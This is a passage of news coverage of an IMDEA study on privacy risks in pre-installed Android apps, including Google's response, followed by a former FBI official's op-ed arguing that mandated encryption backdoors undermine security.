“This type of permission allows the apps advertised on Google Play to evade Android’s permission model to access user data without requiring their consent upon installation of a new app,” writes the IMDEA.

The top-line conclusion of the study is that the supply chain around Android’s open source model is characterized by a lack of transparency — which in turn has enabled an ecosystem to grow unchecked and get established that’s rife with potentially harmful behaviors and even backdoored access to sensitive data, all without most Android users’ consent or awareness. (On the latter front the researchers carried out a small-scale survey of consent forms of some Android phones to examine user awareness.)

tl;dr the phrase ‘if it’s free you’re the product’ is a too trite cherry atop a staggeringly large yet entirely submerged data-gobbling iceberg. (Not least because Android smartphones don’t tend to be entirely free.)

“Potential partnerships and deals — made behind closed doors between stakeholders — may have made user data a commodity before users purchase their devices or decide to install software of their own,” the researchers warn. “Unfortunately, due to a lack of central authority or trust system to allow verification and attribution of the self-signed certificates that are used to sign apps, and due to a lack of any mechanism to identify the purpose and legitimacy of many of these apps and custom permissions, it is difficult to attribute unwanted and harmful app behaviors to the party or parties responsible. This has broader negative implications for accountability and liability in this ecosystem as a whole.”

The researchers go on to make a series of recommendations intended to address the lack of transparency and accountability in the Android ecosystem — including suggesting the introduction and use of certificates signed by globally-trusted certificate authorities, or a certificate transparency repository “dedicated to providing details and attribution for certificates used to sign various Android apps, including pre-installed apps, even if self-signed”.

They also suggest Android devices should be required to document all pre-installed apps, plus their purpose, and name the entity responsible for each piece of software — and do so in a manner that is “accessible and understandable to users”.

“[Android] users are not clearly informed about third-party software that is installed on their devices, including third-party tracking and advertising services embedded in many pre-installed apps, the types of data they collect from them, the capabilities and the amount of control they have on their devices, and the partnerships that allow information to be shared and control to be given to various other companies through custom permissions, backdoors, and side-channels. This necessitates a new form of privacy policy suitable for preinstalled apps to be defined and enforced to ensure that private information is at least communicated to the user in a clear and accessible way, accompanied by mechanisms to enable users to make informed decisions about how or whether to use such devices without having to root their devices,” they argue, calling for overhaul of what’s long been a moribund T&Cs system, from a consumer rights point of view.

In conclusion they couch the study as merely scratching the surface of “a much larger problem”, saying their hope for the work is to bring more attention to the pre-installed Android software ecosystem and encourage more critical examination of its impact on users’ privacy and security.

They also write that they intend to continue to work on improving the tools used to gather the data-set, as well as saying their plan is to “gradually” make the data-set itself available to the research community and regulators to encourage others to dive in.  

Google has responded to the paper with the following statement — attributed to a spokesperson:

We appreciate the work of the researchers and have been in contact with them regarding concerns we have about their methodology. Modern smartphones include system software designed by their manufacturers to ensure their devices run properly and meet user expectations. The researchers’ methodology is unable to differentiate pre-installed system software — such as diallers, app stores and diagnostic tools — from malicious software that has accessed the device at a later time, making it difficult to draw clear conclusions. We work with our OEM partners to help them ensure the quality and security of all apps they decide to pre-install on devices, and provide tools and infrastructure to our partners to help them scan their software for behavior that violates our standards for privacy and security. We also provide our partners with clear policies regarding the safety of pre-installed apps, and regularly give them information about potentially dangerous pre-loads we’ve identified.
This report was updated with comment from Google.

Law enforcement needs to protect citizens and their data

Robert Anderson, Contributor

Robert Anderson served for 21 years in the FBI, retiring as executive assistant director of the Criminal, Cyber, Response and Services Branch. He is currently an advisor at The Chertoff Group and the chief executive of Cyber Defense Labs.

Over the past several years, the law enforcement community has grown increasingly concerned about the conduct of digital investigations as technology providers enhance the security protections of their offerings—what some of my former colleagues refer to as “going dark.”

Data once readily accessible to law enforcement is now encrypted, protecting consumers’ data from hackers and criminals. However, these efforts have also had what Android’s security chief called the “unintended side effect” of also making this data inaccessible to law enforcement. Consequently, many in the law enforcement community want the ability to compel providers to allow them to bypass these protections, often citing physical and national security concerns.

I know first-hand the challenges facing law enforcement, but these concerns must be addressed in a broader security context, one that takes into consideration the privacy and security needs of industry and our citizens in addition to those raised by law enforcement.

Perhaps the best example of the law enforcement community’s preferred solution is Australia’s recently passed Assistance and Access Bill, an overly broad law that allows Australian authorities to compel service providers, such as Google and Facebook, to re-engineer their products and bypass encryption protections to allow law enforcement to access customer data.

While the bill includes limited restrictions on law enforcement requests, the vague definitions and concentrated authorities give the Australian government sweeping powers that ultimately undermine the security and privacy of the very citizens they aim to protect. Major tech companies, such as Apple and Facebook, agree and have been working to resist the Australian legislation and a similar bill in the UK.

Image: Bryce Durbin/TechCrunch

Newly created encryption backdoors and work-arounds will become the target of criminals, hackers, and hostile nation states, offering new opportunities for data compromise and attack through the newly created tools and the flawed code that inevitably accompanies some of them. These vulnerabilities undermine providers’ efforts to secure their customers’ data, creating new and powerful vulnerabilities even as companies struggle to address existing ones.

And these vulnerabilities would not only impact private citizens, but governments as well, including services and devices used by the law enforcement and national security communities. This comes amidst government efforts to significantly increase corporate responsibility for the security of customer data through laws such as the EU’s General Data Protection Regulation. Who will consumers, or the government, blame when a government-mandated backdoor is used by hackers to compromise user data? Who will be responsible for the damage?

Companies have a fiduciary responsibility to protect their customers’ data, which not only includes personally identifiable information (PII), but their intellectual property, financial data, and national security secrets.

Worse, the vulnerabilities created under laws such as the Assistance and Access Bill would be subject almost exclusively to the decisions of law enforcement authorities, leaving companies unable to make their own decisions about the security of their products. How can we expect a company to protect customer data when their most fundamental security decisions are out of their hands?

Image: Bryce Durbin/TechCrunch

Thus far law enforcement has chosen to downplay, if not ignore, these concerns—focusing singularly on getting the information they need. This is understandable—a law enforcement officer should use every power available to them to solve a case, just as I did when I served as a State Trooper and as an FBI Special Agent, including when I served as Executive Assistant Director (EAD) overseeing the San Bernardino terror attack case during my final months in 2015.

Decisions regarding these types of sweeping powers should not and cannot be left solely to law enforcement. It is up to the private sector, and our government, to weigh competing security and privacy interests. Our government cannot sacrifice the ability of companies and citizens to properly secure their data and systems in the name of often vague physical and national security concerns, especially when there are other ways to remedy the concerns of law enforcement.

That said, these security responsibilities cut both ways. Recent data breaches demonstrate that many companies have a long way to go to adequately protect their customers’ data. Companies cannot reasonably cry foul over the negative security impacts of proposed law enforcement data access while continuing to neglect and undermine the security of their own users’ data.

Providers and the law enforcement community should be held to robust security standards that ensure the security of our citizens and their data—we need legal restrictions on how government accesses private data and on how private companies collect and use the same data.

There may not be an easy answer to the “going dark” issue, but it is time for all of us, in government and the private sector, to understand that enhanced data security through properly implemented encryption and data use policies is in everyone’s best interest.

The “extraordinary” access sought by law enforcement cannot exist in a vacuum—it will have far-reaching and significant impacts well beyond the narrow confines of a single investigation. It is time for a serious conversation between law enforcement and the private sector to recognize that their security interests are two sides of the same coin.
